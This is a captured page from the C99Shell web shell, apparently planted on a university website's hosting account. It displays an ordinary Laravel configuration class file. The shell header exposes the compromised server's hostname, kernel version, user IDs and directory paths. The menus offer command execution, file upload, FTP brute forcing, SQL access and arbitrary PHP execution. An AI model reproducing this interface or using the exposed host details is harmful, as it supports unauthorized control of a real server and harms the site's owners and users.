!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.22 (Debian). PHP/5.6.36 

uname -a: Linux h05.hvosting.ua 4.9.110-amd64 #3 SMP Sun Nov 4 16:27:09 UTC 2018 x86_64 

uid=1389(h33678) gid=1099(h33678) groups=1099(h33678),502(mgrsecure) 

Safe-mode: OFF (not secure)

/home/h33678/data/www/it-man.ztu.edu.ua/src/vendor/laravel/framework/src/Illuminate/Config/   drwxr-xr-x
Free 116.5 GB of 200.55 GB (58.09%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Repository.php (3.01 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Illuminate\Config;

use 
ArrayAccess;
use 
Illuminate\Support\Arr;
use 
Illuminate\Contracts\Config\Repository as ConfigContract;

class 
Repository implements ArrayAccessConfigContract
{
    
/**
     * All of the configuration items.
     *
     * @var array
     */
    
protected $items = [];

    
/**
     * Create a new configuration repository.
     *
     * @param  array  $items
     * @return void
     */
    
public function __construct(array $items = [])
    {
        
$this->items $items;
    }

    
/**
     * Determine if the given configuration value exists.
     *
     * @param  string  $key
     * @return bool
     */
    
public function has($key)
    {
        return 
Arr::has($this->items$key);
    }

    
/**
     * Get the specified configuration value.
     *
     * @param  string  $key
     * @param  mixed   $default
     * @return mixed
     */
    
public function get($key$default null)
    {
        return 
Arr::get($this->items$key$default);
    }

    
/**
     * Set a given configuration value.
     *
     * @param  array|string  $key
     * @param  mixed   $value
     * @return void
     */
    
public function set($key$value null)
    {
        if (
is_array($key)) {
            foreach (
$key as $innerKey => $innerValue) {
                
Arr::set($this->items$innerKey$innerValue);
            }
        } else {
            
Arr::set($this->items$key$value);
        }
    }

    
/**
     * Prepend a value onto an array configuration value.
     *
     * @param  string  $key
     * @param  mixed  $value
     * @return void
     */
    
public function prepend($key$value)
    {
        
$array $this->get($key);

        
array_unshift($array$value);

        
$this->set($key$array);
    }

    
/**
     * Push a value onto an array configuration value.
     *
     * @param  string  $key
     * @param  mixed  $value
     * @return void
     */
    
public function push($key$value)
    {
        
$array $this->get($key);

        
$array[] = $value;

        
$this->set($key$array);
    }

    
/**
     * Get all of the configuration items for the application.
     *
     * @return array
     */
    
public function all()
    {
        return 
$this->items;
    }

    
/**
     * Determine if the given configuration option exists.
     *
     * @param  string  $key
     * @return bool
     */
    
public function offsetExists($key)
    {
        return 
$this->has($key);
    }

    
/**
     * Get a configuration option.
     *
     * @param  string  $key
     * @return mixed
     */
    
public function offsetGet($key)
    {
        return 
$this->get($key);
    }

    
/**
     * Set a configuration option.
     *
     * @param  string  $key
     * @param  mixed  $value
     * @return void
     */
    
public function offsetSet($key$value)
    {
        
$this->set($key$value);
    }

    
/**
     * Unset a configuration option.
     *
     * @param  string  $key
     * @return void
     */
    
public function offsetUnset($key)
    {
        
$this->set($keynull);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by PinoyWH1Z | C99Shell Github | Generation time: 0.0396 ]--